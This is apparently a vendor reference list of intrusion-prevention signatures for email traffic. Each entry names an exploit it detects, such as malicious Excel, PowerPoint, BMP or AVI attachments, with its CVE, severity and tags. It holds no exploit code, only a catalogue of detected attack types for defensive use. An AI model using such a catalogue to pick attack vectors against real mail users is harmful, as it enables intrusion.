Vulnerability: Apple-QuickTime-BMP-Handling-Buffer-Overflow
Description:
Back to top

E-Mail_BS-Apple-QuickTime-FPX-File-Handling-Integer-Overflow

About this situation: Detects integer overflow exploits against Apple QuickTime
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Apple-QuickTime-FPX-File-Handling-Integer-Overflow
Description:
Back to top

E-Mail_BS-Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in KeyView IDOL Viewing SDK detected
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Lotus Notes, Autonomy KeyView IDOL Viewing SDK, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-247-3038
Vulnerability: Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow
Description:
Back to top

E-Mail_BS-Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service

About this situation: Denial of service exploit against Clam AntiVirus TNEF decoding vulnerability
Context: E-Mail Body Stream
Severity: 2
Tags: Linux, Any Hardware, ClamAV, CVE2005, Linux not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-57-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service
Description:
Back to top

E-Mail_BS-EICAR-AntiVirus-Test-File

About this situation: Detected an EICAR antivirus test file
Context: E-Mail Body Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

E-Mail_BS-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249

About this situation: A malicious Microsoft Excel document targeting CVE-2010-1249 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-320-4219
Last changed: sgpkg-ips-320-4219
Vulnerability: Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249
Description:
Back to top

E-Mail_BS-Excel-Memory-Corruption-CVE-2010-0823

About this situation: A malicious Microsoft Excel document targeting CVE-2010-0823 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-312-4219
Last changed: sgpkg-ips-312-4219
Vulnerability: Excel-Memory-Corruption-CVE-2010-0823
Description:
Back to top

E-Mail_BS-Executable-File-Transfer

About this situation: Executable file detected
Context: E-Mail Body Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-640-5211
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

E-Mail_BS-FFmpeg-OGV-File-Format-Memory-Corruption

About this situation: Malicious ogv file detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, FFmpeg Project Team FFmpeg, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: FFmpeg-OGV-File-Format-Memory-Corruption
Description:
Back to top

E-Mail_BS-Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow

About this situation: Detects Gnu Tar PAX Extended Headers Handling Buffer Overflow exploits
Context: E-Mail Body Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GNU Tar, CVE2006, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow
Description:
Back to top

E-Mail_BS-Gzip-Compressed-File-Transfer

About this situation: Attempt to transfer gzip compressed file detected
Context: E-Mail Body Stream
Severity: 2
Tags: Any Operating System, Any Hardware, gzip, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Vulnerability: Gzip-Compressed-File
File-Type-Identification
Description:
Back to top

E-Mail_BS-IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Domino detected
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Domino, Any Operating System not specific, Lotus Domino not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-372-4219
Vulnerability: IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow
Description:
Back to top

E-Mail_BS-IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow

About this situation: An attempt to exploit buffer overflow vulnerability in IBM Lotus Notes detected
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Lotus Notes, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow
Description:
Back to top

E-Mail_BS-IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow

About this situation: Detected an attempt to exploit buffer overflow vulnerability in IBM Lotus Notes
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Lotus Notes, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-127-2032
Last changed: sgpkg-ips-354-4219
Vulnerability: IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow
Description:
Back to top

E-Mail_BS-IBM-Lotus-Notes-HTML-Speed-Reader-Long-Url-Buffer-Overflow

About this situation: Detects IBM Lotus Notes HTML Speed Reader Long Url Buffer Overflow exploits
Context: E-Mail Body Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Lotus Notes, CVE2005, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-377-4219
Vulnerability: Generic-IBM-Lotus-Notes-HTML-Speed-Reader-Long-Url-Buffer-Overflow-Vulnerability
Description:
Back to top

E-Mail_BS-IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow

About this situation: Buffer overflow exploit against UUE file handling vulnerability in the attachment viewer of IBM Lotus Notes
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, Lotus Notes, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-256-3038
Vulnerability: SMTP-IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow
Description:
Back to top

E-Mail_BS-Internet-Explorer-JPEG-Rendering-Memory-Corruption

About this situation: Detects JPEG images that exploits memory corruption vulnerability in the Internet Explorer JPEG rendering
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2005-08, CVE2005, Windows not specific, Internet Explorer not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Internet-Explorer-JPEG-Rendering-Memory-Corruption
Description:
Back to top

E-Mail_BS-JavaScript-In-PDF

About this situation: A PDF file containing Javascript
Context: E-Mail Body Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-310-4219
Last changed: sgpkg-ips-312-4219
Vulnerability: JavaScript-In-PDF
Description:
Back to top

E-Mail_BS-JavaScript-With-Open-Action-In-PDF

About this situation: Automatically runnable JavaScript in PDF file
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-310-4219
Last changed: sgpkg-ips-312-4219
Vulnerability: JavaScript-In-PDF
Description:
Back to top

E-Mail_BS-Malicious-BMP-File-CVE-2009-2518

About this situation: A malicious BMP file targeting CVE-2009-2518 detected as a standalone e-mail attachment or an embedded image in an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, MS2009-10, CVE2009, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-259-3038
Vulnerability: Office-BMP-Integer-Overflow-CVE-2009-2518
Description:
Back to top

E-Mail_BS-Microsoft-Embedded-Font-EOT-File-Reference

About this situation: Reference to EOT file in embedded font definition
Context: E-Mail Body Stream
Severity: 2
Tags: Windows, x86, MS2006-01, CVE2006, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-54-1210
Last changed: sgpkg-ips-360-4219
Vulnerability: Microsoft-Embedded-Web-Font-Buffer-Overflow
Description:
Back to top

E-Mail_BS-Microsoft-Excel-Crafted-Url-Buffer-Overflow

About this situation: Detects malicious Microsoft Excel files with a crafted HLINK record
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, Microsoft Excel, MS2006-08, CVE2006, Windows not specific, Microsoft Excel not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-71-1314
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Crafted-Url-Buffer-Overflow
Description:
Back to top

E-Mail_BS-Microsoft-Excel-Embedded-Flash-Object-JavaScript-Code-Execution

About this situation: Detects JavaScript code execution attempts via a Flash object in a crafted Excel file
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, Microsoft Excel, MS2006-11, CVE2006, Windows not specific, Microsoft Excel not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-71-1314
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-Embedded-Shockwave-Flash-Object-Code-Execution
Description:
Back to top

E-Mail_BS-Microsoft-Excel-File-Importing-Code-Execution

About this situation: Malicious Microsoft Excel SYLK document detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2008-03, CVE2008, Windows not specific, Microsoft Excel not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Excel-File-Importing-Code-Execution
Description:
Back to top

E-Mail_BS-Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821

About this situation: A malicious Microsoft Excel document targeting CVE-2010-0821 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-320-4219
Last changed: sgpkg-ips-991-5242
Vulnerability: Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821
Description:
Back to top

E-Mail_BS-Microsoft-Exchange-And-Outlook-TNEF-Decoding-Buffer-Overflow

About this situation: Buffer overflow exploit against Microsoft Exchange and Outlook TNEF decoding vulnerability
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, Exchange Server 2000, Microsoft Outlook, Exchange Server 5.5, Exchange Server 5.0, MS2006-01, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-54-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Exchange-And-Outlook-TNEF-Decoding-Buffer-Overflow
Description:
Back to top

E-Mail_BS-Microsoft-Exchange-Calendar-Code-Execution

About this situation: Detects Microsoft Exchange Server 2000 and 2003 Calendar exploit
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server 2003, Exchange Server 2000, MS2006-05, CVE2006, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-277-4219
Vulnerability: Microsoft-Exchange-Calendar-Code-Execution
Description:
Back to top

E-Mail_BS-Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection

About this situation: Detects script code injection exploits against Microsoft Exchange Server
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, Exchange Server, MS2006-06, CVE2006, Windows not specific, Exchange Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-72-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection
Description:
Back to top

E-Mail_BS-Microsoft-Exchange-TNEF-Decoding-MS09-003-Buffer-Overflow

About this situation: Buffer overflow exploit against Microsoft Exchange TNEF decoding vulnerability
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, Exchange Server 2003, Exchange Server 2000, Exchange Server 2007, MS2009-02, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-205-2032
Last changed: sgpkg-ips-277-4219
Vulnerability: Microsoft-Exchange-TNEF-Buffer-Overflow-MS09-003
Description:
Back to top

E-Mail_BS-Microsoft-Jet-Db-Engine-Buffer-Overflow

About this situation: Crafted mdb file detected. Possible exploit against a vulnerability in Microsoft Jet database engine.
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Jet Database Engine, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-153-2032
Vulnerability: Microsoft-Jet-Db-Engine-Buffer-Overflow
Description:
Back to top

E-Mail_BS-Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879

About this situation: A malicious AVI file targeting CVE-2010-1879 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2010-06, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-310-4219
Last changed: sgpkg-ips-310-4219
Vulnerability: Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879
Description:
Back to top

E-Mail_BS-Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562

About this situation: A malicious Microsoft Excel document targeting CVE-2010-2562 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-08, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-328-4219
Last changed: sgpkg-ips-328-4219
Vulnerability: Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562
Description:
Back to top

E-Mail_BS-Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822

About this situation: A malicious Microsoft Excel document targeting CVE-2010-0822 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-319-4219
Vulnerability: Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822
Description:
Back to top

E-Mail_BS-Microsoft-Office-Excel-Object-Record-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Excel detected
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, MS2009-06, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-245-3038
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Office-Excel-Object-Record-Corruption
Description:
Back to top

E-Mail_BS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129

About this situation: A malicious Microsoft Excel document targeting CVE-2009-3129 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2009-11, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-265-3038
Last changed: sgpkg-ips-371-4219
Vulnerability: Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129
Description:
Back to top

E-Mail_BS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134

About this situation: A malicious Microsoft Excel document targeting CVE-2009-3134 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2009-11, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-265-3038
Last changed: sgpkg-ips-292-4219
Vulnerability: Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134
Description:
Back to top

E-Mail_BS-Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824

About this situation: A malicious Microsoft Excel document targeting CVE-2010-0824 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-320-4219
Last changed: sgpkg-ips-320-4219
Vulnerability: Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824
Description:
Back to top

E-Mail_BS-Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-2573 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-11, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-353-4219
Vulnerability: Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573
Description:
Back to top

E-Mail_BS-Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-2572 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-11, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-353-4219
Vulnerability: Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572
Description:
Back to top

E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-0031 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-281-4219
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031
Description:
Back to top

E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-0032 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-332-4219
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032
Description:
Back to top

E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-0033 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-281-4219
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033
Description:
Back to top

E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034

About this situation: A malicious Microsoft PowerPoint document targeting CVE-2010-0034 detected as an e-mail attachment
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-282-4219
Last changed: sgpkg-ips-282-4219
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034
Description:
Back to top

E-Mail_BS-Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution

About this situation: An attempt to exploit a code execution vulnerability in Microsoft Office Text Convertor over SMTP detected
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2009-04, CVE2009, Windows not specific, Microsoft Office not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-246-3038
Last changed: sgpkg-ips-246-3038
Vulnerability: Microsoft-Office-Text-Converter-Integer-Underflow-Code-Execution
Description:
Back to top

E-Mail_BS-Microsoft-OLE-Structured-Storage-File-Transfer

About this situation: Detected a transfer of OLE Structured Storage file
Context: E-Mail Body Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Microsoft Office, Any Operating System not specific, Microsoft Office not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Vulnerability: Microsoft-OLE-Structured-Storage-File-Transfer
File-Type-Identification
Description:
Back to top

E-Mail_BS-Microsoft-OLE-Structured-Storage-Suspicious-File-Transfer

About this situation: Detected a transfer of a suspicious OLE Structured Storage file
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Vulnerability: Microsoft-OLE-Structured-Storage-File-Transfer
Description:
Back to top

E-Mail_BS-Microsoft-Outlook-iCal-Meeting-Request-Vevent-Record-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, x86, Microsoft Outlook, MS2007-01, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-92-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Outlook-iCal-Meeting-Request-Vevent-Record-Memory-Corruption
Description:
Back to top

E-Mail_BS-Microsoft-Outlook-SMB-Attachment

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2010-07, CVE2010, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-321-4219
Vulnerability: Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution
Description:
Back to top

E-Mail_BS-Microsoft-Outlook-SMB-Msg-Attachment

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook
Context: E-Mail Body Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2010-07, CVE2010, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-322-4219
Last changed: sgpkg-ips-322-4219
Vulnerability: Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution
Description:
Back to top

E-Mail_BS-Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Vulnerability: Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131
Description:
Back to top

E-Mail_BS-Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Vulnerability: Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130
Description:
Back to top

E-Mail_BS-Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Vulnerability: Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221
Description:
Back to top

E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0224

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Vulnerability: Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0224
Description:
Back to top

E-Mail_BS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: E-Mail Body Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Vulnerability: Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225
Description:
Back to top

